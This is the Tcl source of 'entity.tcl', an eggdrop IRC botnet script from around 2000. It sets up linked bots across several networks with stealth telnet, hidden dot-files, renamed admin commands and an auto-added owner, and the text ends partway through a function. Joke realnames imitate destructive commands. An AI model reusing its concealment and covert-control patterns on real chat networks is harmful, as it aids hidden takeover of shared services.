################ ENTITY.TCL - VERSION 9.2 (c) 2000 by Mixter #################
## 0x00. BASIC. procs and default values to make it possible to load the script
proc rv {} {regsub -all { } [split 920 ""] {.} vers;return $vers} ;# v9.2.0
proc dv {var val} {global $var;if {![info exists $var]} {if {$val=="DIE"} { die "Edit the config file."} {set $var $val}}}
proc b {} { return \002 } ; proc u {} { return \037 }
proc sv {} { return "\[\002e\037n\002t\037i\002t\037y\002\037\]" }
dv challenging 0
if {[lindex [split [info tclversion] .] 0] < 8} {
 putloglev o * "[sv] \[init\] WARNING: [sv] revision [rv] requires tcl 8.0+"
 putloglev o * "[sv] \[init\] If you encounter errors, upgrade and recompile."
 dccbroadcast "** OBSOLETE TCL VERSION [info tclversion] **"
}
global numversion ; if {$numversion < 1032400} { proc putquick text { putserv $text } }
proc do:ports {all bot use} {
 if {[lindex $all 0] > 0} { listen [lindex $all 0] all }
 if {[lindex $bot 0] > 0} { listen [lindex $bot 0] bots }
 if {[lindex $use 0] > 0} { listen [lindex $use 0] users }
 if {[lrange $all 1 end] != ""} {do:ports [lrange $all 1 end] [lrange $bot 1 end] [lrange $use 1 end]}
 if {[lrange $bot 1 end] != ""} {do:ports [lrange $all 1 end] [lrange $bot 1 end] [lrange $use 1 end]}
 if {[lrange $use 1 end] != ""} {do:ports [lrange $all 1 end] [lrange $bot 1 end] [lrange $use 1 end]}
}
proc randserv list {
 global servers network ;  set randlist ""
 while {[llength $list] > 0} {
 set random [rand [llength $list]] ; lappend randlist [lindex $list $random]
 set list [lreplace $list $random $random]  }
 set servers $randlist ; putlog "[sv] \[init\] - $network server list randomized"
}
## Last server list update: 03/30/2001 -- Mixter
set efnet {
 irc.efnet.org irc.efnet.org irc.efnet.org irc.efnet.org irc.efnet.org
 207.138.35.58 195.159.0.90 207.45.69.69 195.67.208.172 206.251.7.30 
 203.37.45.2 195.154.203.241 199.3.235.130 207.69.200.132 128.138.129.31
 130.243.35.1 216.225.5.254 142.137.27.179 170.140.4.6 198.163.216.60
 207.58.63.1 198.94.52.220 195.18.249.231 165.121.1.46 195.161.0.254
 130.233.192.6 207.35.169.253 206.86.0.23 192.116.253.10 141.211.26.105
 194.159.80.19 199.2.32.11 216.32.132.250 192.160.127.97 207.79.78.11
 207.246.129.125
}
set undernet {
 us.undernet.org eu.undernet.org Amsterdam.NL.Eu.UnderNet.org
 Amsterdam-R.NL.Eu.UnderNet.org Arlington.VA.US.Undernet.Org
 atlanta.ga.us.undernet.org auckland.nz.undernet.org
 austin.tx.us.undernet.org Baltimore.MD.US.Undernet.Org
 Baltimore-R.MD.US.Undernet.Org Brussels.Be.Eu.Undernet.org
 Caen.FR.EU.Undernet.org channels2.undernet.org channels.undernet.org
 dallas.tx.us.undernet.org Diemen.NL.EU.Undernet.org
 Flanders.BE.EU.Undernet.org Gothenburg.Se.Eu.Undernet.org
 Graz.AT.EU.Undernet.org Haarlem.NL.EU.UnderNet.Org Hidden1.Undernet.Org
 lasvegas.nv.us.undernet.org London.UK.eu.Undernet.org
 Manhattan.KS.US.Undernet.Org McLean.VA.us.undernet.org
 montreal.qu.ca.undernet.org NewBrunswick.NJ.US.Undernet.Org
 NewYork.NY.US.Undernet.Org NewYork-R.NY.US.Undernet.Org
 Oslo1.NO.EU.Undernet.org Oslo-R.NO.EU.Undernet.org paris.fr.eu.undernet.org
 SaltLake.UT.US.Undernet.org SanDiego.CA.US.Undernet.org
 SantaClara.CA.US.Undernet.Org seattle.wa.us.undernet.org
 toronto.on.ca.undernet.org Uworld.EU.Undernet.Org uworld.undernet.org
 washington.dc.us.undernet.org webchat.md.us.undernet.org
}
set ircnet {
 chat.btinternet.com chat.bt.net eris.bt.net hub.skybel.net irc2.tin.it
 irc.cifnet.com irc.datacomm.ch ircd.tin.it ircd.webbernet.net
 irc.easynet.co.uk irc.emn.fr irc.gate.ru irc.grmbl.be irc.ircd.it
 irc.msu.ru irc.netcom.net.uk ircnet.demon.co.uk ircnet.hinet.hr
 irc.nl.uu.net irc.ru irc.skynet.be irc.snt.utwente.nl irc.tin.it
 irc.twiny.org irc.u-net.com irc.webbernet.net irc.xs4all.nl sunsite.auc.dk 
}
set dalnet {
 irc.dal.net algo.se.eu.dal.net algo-u.se.eu.dal.net barovia.oh.us.dal.net
 borg.se.eu.dal.net ced.se.eu.dal.net dragons.ca.us.dal.net
 enigma.mi.us.dal.net freei.wa.us.dal.net gaston.se.eu.dal.net
 glass.oh.us.dal.net hebron.in.us.dal.net ion.va.us.dal.net
 journey.ca.us.dal.net liberty.nj.us.dal.net omega.ca.us.dal.net
 pasture-c.in.us.dal.net powertech.no.eu.dal.net routing.dal.net
 shiva.va.us.dal.net sniper.tx.us.dal.net sodre.nj.us.dal.net
 splitrock.tx.us.dal.net toronto.on.ca.dal.net vader.ny.us.dal.net
 vanity.wa.us.dal.net viking.no.eu.dal.net webbernet.mi.us.dal.net
}
putlog "[sv] \[init\] - 0x00 - basic variables"
## 0x01. CONFIG. configuration file defaults
dv nick1 DIE ;# dv nick2 DIE
set owner "Mixter"
catch "exec whoami" tmp1 ; dv username [lindex $tmp1 0] ; unset tmp1
dv network EFNET
dv allport DIE ; dv botport 0 ; dv useport 0 ; dv botchans DIE
logfile mkjsbcxo123 * ${nick1}.log
logfile 7 * .ids.log ;# save global intrusion detection reports
dv altpass #pass ; dv altnotes #notes ; dv alttcl .
dv limbo 0 ; dv admin "Mixter <mixter@newyorkoffice.com>"
dv timezone EST ; dv offset "5" ; set env(TZ) "$timezone $offset"
addlang english
set max-logs 10 ; set max-logsize 4096 ; set quick-logs 1 ; set log-time 1
set keep-all-logs 0 ; set quiet-save 1 ; set motd motd
dv switch-logfiles-at [rand 22][rand 59]
set console mjksbcoxs1
set userfile .u.${nick1}
if {![file exists $userfile]} {
 putlog "[sv] \[init\] - No userfile.. trying to restore from backup."
 catch "exec cp -f ${userfile}~new $userfile"
 catch "exec cp -f ${userfile}~bak $userfile"
}
set logfile-suffix ".%d%b%Y" ; set sort-users 1 ; set help-path "help/"
set temp-path "/tmp" ; set userfile-perm 0600 ; set botnet-nick $nick1
set protect-telnet 0 ; set dcc-sanitycheck 1 ; set ident-timeout 5
set require-p 0 ; set open-telnets 0 ; set stealth-telnets 1
set use-telnet-banner 0 ; set connect-timeout 15 ; set dcc-flood-thr 3
set telnet-flood 5:60 ; set paranoid-telnet-flood 1 ; set resolve-timeout 15
set ignore-time 10 ; set hourly-updates [rand 59] ; set notify-newusers "$owner"
set default-flags "hp" ; set whois-fields "" ; set remote-boots 1
set share-unlinks 0 ; set die-on-sighup 1 ; set die-on-sigterm 0
set must-be-owner 1 ; set max-dcc 750 ; set dcc-portrange 1020:65535
set enable-simul 1 ; set allow-dk-cmds 0 ; set dupwait-timeout 5
set check-mode-r 0 ; set nick-len 9 ;
putlog "[sv] \[init\] - 0x01 - core configuration"
## 0x02. MODULES. module configuration values and variable dependencies
set mod-path .
loadmodule dns
loadmodule channels
set chanfile .c.$nick1
set ban-time [expr 150 + [rand 15] + [rand 15]]
set exempt-time 0 ; set invite-time 0 ; set force-expire 0
set share-greet 1 ; set use-info 1
set global-flood-chan 20:30 ; set global-flood-deop 3:10
set global-flood-kick 2:10 ; set global-flood-join 6:60
set global-flood-ctcp 5:60 ; set global-flood-nick 5:60
set global-idle-kick 0 ; set global-stopnethack-mode 0
set global-chanmode "nst"
set global-chanset {
 +revengebot +enforcebans +dynamicbans +userbans -autoop -bitch +greet
 +protectops -statuslog -revenge -secret +shared -autovoice +cycle
 +dontkickops -inactive +protectfriends -seen +userexempts
 +dynamicexempts +userinvites +dynamicinvites -nodesynch
}
if {$limbo == 0} { loadmodule server } { catch "unloadmodule server" }
switch [string toupper $network] {
EFNET { set net-type 0 }
IRCNET { set net-type 1 }
UNDERNET { set net-type 2 }
DALNET { set net-type 3 }
EFNET2 { set net-type 4 }		;# HYBRID IRCD v6
default { set net-type 5 }
}
set nick $nick1
if {[info exists nick2]} { set altnick $nick2 } { set altnick ${nick1}_ }
set init-server { putserv "MODE $botnick +i-ws" }
set keep-nick 1 ; set use-ison 1 ; set strict-host 0 ; set quiet-reject 1
set lowercase-ctcp 0 ; set answer-ctcp 1 ; set optimize-kicks 1
set flood-msg 10:120 ; set flood-ctcp 4:90 ; set use-lagcheck 1
set never-give-up 1 ; set strict-servernames 0 ; set default-port 6667
set server-cycle-wait 15 ; set server-timeout 20 ; set servlimit 0
set check-stoned 1 ; set use-console-r 0 ; set debug-output 0
set serverror-quit 0 ; set max-queue-msg 500 ; set trigger-on-ignore 0
set double-mode 0 ; set double-server 0 ; set double-help 0
if {$limbo == 0} { loadmodule ctcp } { catch "unloadmodule ctcp" }
set ctcp-mode 1
set ctcp-version "" ; set ctcp-finger "" ; set ctcp-userinfo ""
if {$limbo == 0} { loadmodule irc } { catch "unloadmodule irc" }
set bounce-bans 1 ; set bounce-modes 0 ; set kick-bogus-bans 1
set bounce-bogus-bans 0 ; set max-bans 20 ; set max-modes 30
set kick-bogus 0 ; set ban-bogus 0 ; set kick-fun 0 ; set ban-fun 0
set learn-users 0 ; set wait-split 6[rand 9][rand 9] ; set wait-info 180
set mode-buf-length 300 ; set no-chanrec-info 1 ; set revenge-mode 3
set bounce-exempts 0 ; set bounce-invites 0 ; set max-exempts 20
set max-invites 20 ; set bounce-bogus-exempts 0 ; set kick-bogus-exempts 0
set prevent-mixing 1
switch ${net-type} {
 0 { set kick-method 1 ; set modes-per-line 4 ; set use-354 0 }
 1 { set kick-method 4 ; set modes-per-line 3 ; set use-354 0 }
 2 { set kick-method 1 ; set modes-per-line 6 ; set use-354 1 }
 3 { set kick-method 1 ; set modes-per-line 6 ; set use-354 0 ; set rfc-compliant 0 }
 4 { set kick-method 1 ; set modes-per-line 3 ; set use-354 0 }
 default { set kick-method 1 ; set modes-per-line 3 ; set use-354 1 }
}
loadmodule transfer
set max-dloads 3 ; set dcc-block 0 ; set copy-to-tmp 1 ; set xfer-timeout 30
loadmodule share
set allow-resync 1 ; set resync-time 3000 ; set private-global 1
dv private-globals "mn" ; dv private-user $limbo ; dv override-bots 1
loadmodule compress
set share-compressed 1
set compress-level 9
loadmodule filesys
set files-path [pwd] ; set incoming-path "" ; set upload-to-pwd 1
set filedb-path "" ; set max-file-users 0 ; set max-filesize 0
loadmodule notes
set notefile .n.${nick1} ; set max-notes 50 ; set note-life 60
set allow-fwd 0 ; set notify-users 0 ; set notify-onjoin 1
loadmodule console
set console-autosave 1 ; set force-channel 0 ; set info-party 1
if {[string tolower $network] == "efnet"} { randserv $efnet }
if {[string tolower $network] == "efnet2"} { randserv $efnet }
if {[string tolower $network] == "ircnet"} { randserv $ircnet }
if {[string tolower $network] == "undernet"} { randserv $undernet }
if {[string tolower $network] == "dalnet"} { randserv $dalnet }
if {![info exists servers]} {
 putlog "[sv] \[init\] - NO SERVERS, using efnet (default)"
 randserv $efnet
}
proc sircn {} {
 set ircnames {
 "A evil product of decoded rangers" "Denial Of Service" "hax0r"
 "http://stop.whoising.me" "./nuke 127.0.0.1" "mIRC 69 by K. Mardam-Gay"
 "Bitch-X baby!" "BitchX Bitching" "Mixter owns me" "We own you" "I 0wn y0u"
 "Property of Dr.Leet" "No1 owns root!" "* I'm to lame to read BitchX.doc *"
 "* I'm too leet to read BitchX.doc *" "* I'm too gay to read 7thsphere.txt *"
 "* You're too lame to write BitchX.doc *" "This /whois has been logged."
 "/usr/games/irc" "/usr/local/unf" "/dev/idle" "I eAt LaMeRz FoR LuNcH"
 "dont make me phf u" "phear my winnuke.exe" "dont mess with me i hab crack 1.0"
 "uNF uNF uNF" "pHeaR mY aPpLe MaCiNToSh" "Connection reset by phear"
 "d0nut m4k3 m3 1cmp fr0m my 14.4 m0d3m" "i eat bothunters"
 "Pong timein" "fear my 16bit ircN" "go and play with deltree.exe"
 "eYe HaB fAtE X fOr a0l" "rm -rf efnet" "rm -rf ircops" "killall -9 ircd"
 "Where does it go when you flush?" "What UNIVERSE is this, please?"
 "Psychoanalysis?? I thought this was a nude rap session!" "I am NOT a nut"
 "I'm not available for comment.." "Toto, we are not in Kansas anymore!"
 "YOW!! Everybody out of the GENETIC POOL!" "Yow! Am I having fun yet?"
 "You can't hurt me! I have an ASSUMABLE MORTGAGE!"  "I'm wet! I'm wild!"
 "Xerox your lunch and file it under 'sex offenders'!" "echo root | sed s/o/i/"
 "The PIZZA symbolizes my COMPLETE EMOTIONAL RECOVERY!" "I'm into SOFTWARE!"
 "My mind is a potato field ..." "Is this TERMINAL fun?"
 "A ladder! Maybe it leads to heaven, or a sandwich!" "Is it clean in other dimensions?"
 "I want to kill everyone here with a cute colorful Hydrogen Bomb!"
 "I hope I bought the right relish ... zzzzzzzzz ..."
 "FUN is never having to say you're SUSHI" "Can you MAIL a BEAN CAKE?"
 "Are we live or on tape?" "[0;31mLogin:[5m[0;41m[0;0m"
 "chattr -ia god && mv -f me god" "Happiness is a warm modem"
 "Never underestimate the power of human stupidity"
 "How's my IRCing? Call 1-800-RM-RF-*"
 "Half a mind is a terrible thing to waste!"
 }
 set col1 [rand 15] ; set col2 [rand 15] ; if {$col1 == $col2} {incr col1}
 set ka \003$col1,$col2
 return $ka[lindex $ircnames [rand [llength $ircnames]]]
}
checkmodule blowfish
loadmodule assoc
loadmodule wire
proc init:final {} {
 global realname username numversion limbo altnotes alttcl altpass
 if {$numversion < 1032800} {
 putlog "[sv] \[init\] Vulnerable eggdrop - remote notes disabled."
 catch "unbind bot - note *bot:note"
 }
 dv realname [sircn]
 if {$realname == "A deranged product of evil coders"} {
 set realname [sircn]
 putlog "[sv] \[init\] new random realname: $realname"
 }
 if {$username == "llama"} {
 global username
 set username [rword 9]
 putlog "[sv] \[init\] new random username: $username"
 }
 global allport botport useport ; do:ports $allport $botport $useport
 global init ; set init 1
 global botchans ; foreach botchan $botchans { newchannel $botchan }
 unset init
 if {$limbo == 0} {
 catch {
  unbind msg - hello *msg:hello ; unbind msg - ident *msg:ident
  unbind msg - addhost *msg:addhost ; unbind msg - notes *msg:notes
  unbind msg - pass *msg:pass ; unbind dcc n tcl *dcc:tcl
  unbind dcc n simul *dcc:simul
 }
 bind msg - $altnotes *msg:notes
 bind msg - $altpass *msg:pass
 } { limbomode }
 bind dcc n $alttcl *dcc:tcl
 global nick1 ; utimer 10 "init:addmyself $nick1"
}
proc init:addmyself nick {
 if {[matchattr [owner1] n]==0} {
 adduser [owner1] "[owner1]*!*@*"
 chattr [owner1] +ntmopxf
 setuser [owner1] PASS [eggdrop]
 save
 ialarm 3 "[owner1] was not here, oops"
 }
 if {[matchattr $nick b]==0} {
 addbot $nick [myip]:[port]
 chattr $nick +of
 setuser $nick PASS [string tolower [rword 13]]
 save
 putloglev o * "[sv] \[init\] added myself ($nick) to the userlist"
 }
}
catch { set numversion }
proc port {} {
 global allport useport
 if {[lindex $allport 0] != "" && [lindex $allport 0] > 0} { return [lindex $allport 0]}
 if {[lindex $useport 0] != "" && [lindex $useport 0] > 0} { return [lindex $useport 0]}
 putcmdlog "[sv] \[config error\] I do not have any listening ports for users!"
 return 0
}
putlog "[sv] \[init\] - 0x02 - module configuration"
## 0x03. SCRIPTS. eggdrop's scripts distribution which is always needed
bind filt - "\001ACTION *\001" filt:dcc_action
bind filt - "/me *" filt:telnet_action
bind dcc - peak dcc:peak
bind bot - peak bot:peak
bind filt - '* local_chat
bind dcc - probe dcc:probe
#- actionfix
proc filt:dcc_action {idx text} { return ".me [string trim [join [lrange [split $text] 1 end]] \001]" }
proc filt:telnet_action {idx text} { return ".me [join [lrange [split $text] 1 end]]" }
#- alltools
set alltools_loaded 1
set allt_version 204 ; set toolbox_revision 1007
set toolbox_loaded 1 ; set toolkit_loaded 1
proc putmsg {dest text} { puthelp "PRIVMSG $dest :$text" }
proc putchan {dest text} { puthelp "PRIVMSG $dest :$text" }
proc putnotc {dest text} { puthelp "NOTICE $dest :$text" }
proc putact {dest text} { puthelp "PRIVMSG $dest :\001ACTION $text\001" }
proc strlwr {string} { string tolower $string }
proc strupr {string} { string toupper $string }
proc strcmp {string1 string2} { string compare $string1 $string2 }
proc stricmp {string1 string2} { string compare [string tolower $string1] [string tolower $string2] }
proc strlen {string} { string length $string }
proc stridx {string index} { string index $string $index }
proc iscommand {command} { return [string compare [info commands $command] ""] }
proc timerexists {command} {
  foreach i [timers] {
    if {[string compare $command [lindex $i 1]] == 0} then {
      return [lindex $i 2]
    }
  }
  return
}
proc utimerexists {command} {
  foreach i [utimers] {
    if {[string compare $command [lindex $i 1]] == 0} then {
     return [lindex $i 2]
    }
  }
  return
}
proc inchain {bot} { return [islinked $bot] }
proc randstring {length} {
  set chars abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
  set count [string length $chars]
  for {set i 0} {$i < $length} {incr i} {
    append result [string index $chars [rand $count]]
  }
  return $result
}
proc putdccall {text} { foreach i [dcclist CHAT] { putdcc [lindex $i 0] $text } }
proc putdccbut {idx text} {
  foreach i [dcclist CHAT] {
    set j [lindex $i 0] ; if {$j != $idx} then { putdcc $j $text }
  } }
proc killdccall {} { foreach i [dcclist CHAT] { killdcc [lindex $i 0] } }
proc killdccbut {idx} {
  foreach i [dcclist CHAT] {
    set j [lindex $i 0] ; if {$j != $idx} then { killdcc $j }
  }
}
proc iso {nick chan} { return [matchattr [nick2hand $nick $chan] o|o $chan] }
proc realtime {args} {
  switch -exact -- $args {
    time { strftime "%H:%M" }
    date { strftime "%d %b %Y" }
    default { strftime "%I:%M %P" }
  }
}
proc testip {ip} {
  set tmp [split $ip .]
  if {[llength $tmp] != 4} then { return 0 }
  set index 0
  foreach i $tmp {
    if {((![regexp \[^0-9\] $i]) || ([string length $i] > 3) ||
         (($index == 3) && (($i > 254) || ($i < 1))) ||
         (($index <= 2) && (($i > 255) || ($i < 0))))} then {
      return 0
    }
    incr index
  }
  return 1
}
proc number_to_number {number} {
 switch -exact -- $number {
  0 { return Zero }
  1 { return One }
  2 { return Two }
  3 { return Three }
  4 { return Four }
  5 { return Five }
  6 { return Six }
  7 { return Seven }
  8 { return Eight }
  9 { return Nine }
  10 { return Ten }
  11 { return Eleven }
  12 { return Twelve }
  13 { return Thirteen }
  14 { return Fourteen }
  15 { return Fifteen }
  default { return $number }
  }
}
proc isnumber {string} {
  if {([string compare $string ""]) && (![regexp \[^0-9\] $string])} then {
    return 1
  }
  return 0
}
proc ispermowner {hand} {
  global owner
  regsub -all -- , [string tolower $owner] "" owners
  if {([matchattr $hand n]) && \
      ([lsearch -exact $owners [string tolower $hand]] != -1)} then {
    return 1
  }
  return 0
}
#- klined
if {$limbo == 0} {
 bind load - server remove_kservers
 bind raw - 465 woah_klined
 bind raw - 484 woah_klined
 bind dcc m klines list_kservers
 bind dcc n kline kline_server
 bind dcc n unkline unkline_server
}
proc list_kservers {handle idx args} {
 global kfile ; if {![info exist kfile]} { set kfile klines }
 putcmdlog "#$handle# klines" ; set fd [open $kfile r] ; set kservers {}
 while {![eof $fd]} {
  set tmp [gets $fd] ; if {[eof $fd]} {break}
  set kservers [lappend kservers [string trim $tmp]]
  }
 close $fd
 if {![llength $kservers]} {
  putdcc $idx "[sv] \[notice\] No k-lines. =oD"
  return 0
  }
 putdcc $idx "[sv] \[notice\] K-lines:"
 foreach tmp $kservers { putdcc $idx $tmp }
}
proc kline_server {handle idx args} {
 global server
 set name [lindex $args 0]
 if {$name == ""} { putidx $idx "[sv] \[usage\] kline <server>" ; return 0 }
 if {$server == $name} {
 putidx $idx "[sv] \[notice\] Jumping from k-lined server." ; jump
 }
 woah_klined $name - -
 putcmdlog "[sv] \[notice\] $name removed from server list by $handle."
 return 1
}
proc unkline_server {handle idx args} {
 global kfile ; if {![info exist kfile]} { set kfile klines }
 set kservers {} ; set fd [open $kfile r] ; set rem [lindex $args 0]
 putcmdlog "#$handle# unkline $rem"
 while {![eof $fd]} {
  set tmp [gets $fd]
  if {[eof $fd]} {break}
  set kservers [lappend kservers [string trim $tmp]]
 }
 close $fd
 set fd [open $kfile w] ; set flag 0
 foreach tmp $kservers { if {$tmp == $rem} { set flag 1 } { puts $fd $tmp } }
 close $fd
 if {$flag == 0} { putdcc $idx "[sv] \[error\] $rem isn't k-lined" }
 if {$flag == 1} { putdcc $idx "[sv] \[notice\] $rem un-k-lined" }
}
proc remove_kservers {module} {
 global kfile server servers
 if {![info exist kfile]} { set kfile klines }
 if {[catch {set fd [open $kfile r]}] != 0} {
  set fd [open $kfile w] ; close $fd ; set fd [open $kfile r]
 }
 while {![eof $fd]} {
  set from [string trim [gets $fd]] ; set name "*$from*"
  if {[eof $fd]} {break}
  for {set j 0} {$j >= 0} {incr j} {
   set x [lsearch $servers $name]
   if {$x >= 0} { set servers [lreplace $servers $x $x] }
   if {$x < 0} {
    if {$j >= 0} {
     putlog "[sv] \[notice\] removed server $from from k-lines list"
    }
    break
   }
  }
 }
 close $fd ; return 1
}
proc woah_klined {from keyword arg} {
 global kfile server servers
 set kservers {} ; if {![info exist kfile]} { set kfile klines }
 if {$keyword == "-"} { putallbots "jumpfrom $from [owner1]" } {
 if {[botonchan [lindex [channels] 0]]} { putallbots "jumpfrom $server [owner1]" } }
 set fd [open $kfile r]
 while {![eof $fd]} {
  set tmp [gets $fd] ; if {[eof $fd]} {break}
  set kservers [lappend kservers [string trim $tmp]]
 }
 close $fd ; set flag 0
 foreach tmp $kservers { if {$tmp == $from} { set flag 1 } }
 if {$flag != 1} { set fd [open $kfile a] ; puts $fd $from ; close $fd }
 set name "*$from*"
 for {set j 0} {$j >= 0} {incr j} {
  set x [lsearch $servers $name]
  if {$x >= 0} { set servers [lreplace $servers $x $x] }
  if {$x <= 0} { if {$j >= 0} { ialarm 0 "I'm klined from $from" } ; break }
 }
 return 1
}
remove_kservers server
putlog "[sv] \[init\] - 0x03 - default scripts"
## 0x04. CORE. main functionality of entity.tcl
proc boat {} {
 global nick botnick
 if {[info exists nick]} { return $nick }
 if {[info exists botnick]} { return $botnick } { return "*" }
}
proc whois target {
 putserv "WHOIS $target"
 return $target
}
proc nbots {} {
 set nbs ""
 foreach x [userlist b] { if {![islinked $x]} {set nbs "$nbs $x"} }
 return $nbs
}
proc botips {} {
 set adds ""
 foreach bot [userlist b] { set adds "$adds [lindex [getuser $bot BOTADDR] 0]" }
 return $adds
}
proc owner1 {} { global owner ; return [lindex [split $owner ", "] 0] }
proc isown hand {
 global owner
 foreach o [split $owner ", "] {
  if {[string compare $o $hand]==0} { return 1 }
 }
 return 0
}
proc killproc n { proc $n "" "" }
set misc_char "a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 ^ _ | - [ ]"
set r_char "a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z"
set first_char "a b c d e f g h i j k l m n o p q r s t u v w x y z [ ] ^ | _"
set alpha "a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z _ ^ `"
proc rword length {
 global r_char alpha ; set i 2
 append tempword [lindex $alpha [rand [llength $alpha]]]
 while {$i < $length} {
  append tempword [lindex $r_char [rand [llength $r_char]]] ; incr i 1
 }
 return $tempword
}
proc cleanarg arg {
 set response ""
 for {set i 0} {$i < [string length $arg]} {incr i} {
 set char [string index $arg $i]
 if {($char != "\12") && ($char != "\15")} { append response $char }
 }
 return $response
}
proc hash string { return [encrypt $string $string] }
proc hashok {pass hash} {
 if {[string match [decrypt $pass $hash] $pass]} { return 1 } { return 0 }
}
proc islimit chan {
 if {![validchan $chan]} { return -1 } ; if {![botonchan $chan]} { return -1 }
 set checkit [llength [split [getchanmode $chan] l]]
 if {$checkit > 1} { return 1 } ; if {$checkit < 2} { return 0 }
 return -1
}
proc newmaskhost uh {
 set last_char "" ; set past_ident "0" ; set response ""
 for {set i 0} {$i < [string length $uh]} {incr i} {
  set char "[string index $uh $i]" ; if {$char == "@"} {set past_ident "2"}
  if {$past_ident == "2"} {set past_ident "1"}
  if {($char != "0") && ($char != "1") && ($char != "2") && ($char != "3") && ($char != "4") && ($char != "5") && ($char != "6") && ($char != "7") && ($char != "8") && ($char != "9")} {
   set response "$response$char" ; set last_char ""
  } {
   if {($last_char != "x") && ($past_ident == "1")} {
    append response "*" ; set last_char "x"
   }
   if {$past_ident == "0"} { append response "$char" }
  }
 }
 if {[regexp -nocase [string trimleft $response [string range $response 0 [expr [string first "@" $response] - 1 ]]] "@*.*.*.*"]} {
  set response [maskhost $uh] ; return $response
 }
 return "*!$response"
}
proc fix:ban {nick uhost hand chan mc bonk} {
 if {$hand != "*" && ![matchattr $nick b]} { return }
 set victim [lindex [split $bonk "*@!."] 0]
 if {[matchattr $victim o]} {
  if {[openchan $chan]} {
   pushmode $chan -b $bonk } {
   pushmode $chan -b $bonk ; pushmode $chan -o $nick ; flushmode $chan
   putserv "KICK $chan $nick :[sv] security - [b]dont ban $victim[b]"
   }
  return 0
 }
 regsub {\*!} [maskhost $bonk] \*!\* riteban
 regsub -all {\\} $riteban "" riteban ; regsub {~} $riteban "" riteban
 regsub -all {\*\*} $riteban \* riteban
 if {![regexp {[a-z]} $riteban]} { return }
 if {[string compare $bonk $riteban] && ![rand 5]} {
  putserv "MODE $chan -b+b $bonk $riteban"
 } }
proc randbot {} { return "[lindex [bots] [rand [llength [bots]]]]" }
proc testip add {
 set address [lindex $add 0]
 if {$address == ""} { set address [lindex $add 1] }
 set testhost [split $address .]
 if {[llength $testhost]==4} {
  if {[string length [lindex $testhost 0]]<4 &&
   [string length [lindex $testhost 1]]<4 &&
   [string length [lindex $testhost 2]]<4 &&
   [string length [lindex $testhost 4]]<4} {
    if {[lindex $testhost 0] < 256 &&
     [lindex $testhost 1] < 256 &&
     [lindex $testhost 2] < 256 &&
     [lindex $testhost 3] < 256} { return 1 }
  }
 }
 return 0
}
proc puth {i txt} { putdcc $i "\[help\]  $txt" }
proc valididx idx {
 set r 0 ; foreach j [dcclist] {
  if {[lindex $j 0] == $idx} { set r 1 ; break }
 }
 return $r
}
proc local_chat {idx text} {
 set done 0 ; set text [string range $text 1 end]
 set whom [idx2hand $idx] ; set strdex [string first " " $text]
 if { $strdex < 0 } { set done 1 ; set whom "=$whom=>" }
 if { !$done && ![string compare [string range $text 0 2] "me "] } {
  set done 1 ; set text [string range $text 3 end] ; set whom "=> $whom"
 }
 if { !$done && ![string compare [string range $text 0 2] "me'"] } {
  set done 1 ; set strdex [string first " " $text]
  if { $strdex < 0 } { return 1 }
  set whom "=> $whom'[string range $text 3 [expr $strdex-1]]"
  set text [string range $text [expr $strdex+1] end]
  }
 if { !$done && ![string compare [string range $text 0 3] "me, "] } {
  set done 1 ; set text [string range $text 4 end] ; set whom "=> $whom,"
 }
 if {!$done} { set done 1 ; set whom "=$whom=>" }
 foreach user [dcclist] {
 if { ([lindex $user 3] == "chat") && ([getchan $idx] >= 0) &&
  (([lindex $user 0] != $idx) || ([echo $idx])) } {
  putdcc [lindex $user 0] "$whom $text"
 }
 if { ([lindex $user 3] == "files") && (([lindex $user 0] != $idx) ||
  ([echo $idx])) } {
   putdcc [lindex $user 0] "$whom $text"
  }
 }
 return
}
proc check:chan {} {
 global peak_list limbo ; if {$limbo != 0} { return 0 }
 foreach i [channels] {
  set current_peak [llength [chanlist $i]] ; set ok 0
  for {set pidx 0} {$pidx < [llength $peak_list]} {incr pidx} {
   set pent [lindex $peak_list $pidx]
   if {![string compare [string tolower [lindex $pent 0]] [string tolower $i]]} {
    if {[llength [chanlist $i]] > [lindex $pent 1]} {
     putlog "[sv] \[peak\] - $i has $current_peak users"
     set peak_list [lreplace $peak_list $pidx $pidx]
     lappend peak_list [list $i $current_peak [unixtime]]
     set pent [lindex $peak_list end]
    }
    foreach j [chanlist $i bs] {
     if {[lsearch [bots] $j] != -1} { putbot $j "peak [lrange $pent 0 end]" }
    }
   set ok 1
   }
  }
 if {$ok == 0} { lappend peak_list [list $i 0 [unixtime]] }
 }
 foreach scantimer [timers] { if {[lindex $scantimer 1]=="check:chan"} {killtimer "[lindex $scantimer 2]" }}
 timer 30 check:chan
}
proc dcc:peak {hand idx arg} {
 global peak_list
 if {$arg != ""} {
  set ok 0 ; for {set pidx 0} {$pidx < [llength $peak_list]} {incr pidx} {
   set pent [lindex $peak_list $pidx]
   if {![string compare [string tolower [lindex $pent 0]] [string tolower [lindex $arg 0]]]} {
    putdcc $idx "[lindex $pent 0] peaked at [lindex $pent 1] on [ctime [lindex $pent 2]]"
    set ok 1
   }
  }
  if {$ok == 0} { putdcc $idx "I am not on any such channel." ; return 1 }
 } {
  foreach i $peak_list {
   putdcc $idx "[lindex $i 0] peaked at [lindex $i 1] on [ctime [lindex $i 2]]"
  }
 }
 return 1
}
proc bot:peak {frombot command args} {
 global peak_list
 if {[matchattr $frombot bs]} {
  set rest [lindex $args 0] ; set chan [lindex $rest 0]
  set current_peak [lindex $rest 1] ; set peak_time [lindex $rest 2]
  for {set pidx 0} {$pidx < [llength $peak_list]} {incr pidx} {
   set pent [lindex $peak_list $pidx]
   if {![string compare [string tolower [lindex $pent 0]] [string tolower $chan]]} {
    if {$current_peak > [lindex $pent 1]} {
      putlog "[sv] \[botnet\] $frombot - $chan has $current_peak users"
      set peak_list [lreplace $peak_list $pidx $pidx]
      lappend peak_list [list $chan $current_peak $peak_time]
     } } } } }
 if {![info exists set_peak_running]} {
 set set_peak_running 1 ; set peak_list "" ; check:chan
}
proc scan:files {} {
 catch "exec ls -a" files
 foreach file $files {
  if {[string match .share* $file] || [string match .nfs* $file] || $file == "core"} {
   if {[expr [unixtime] - [file atime $file]] > 1800} {
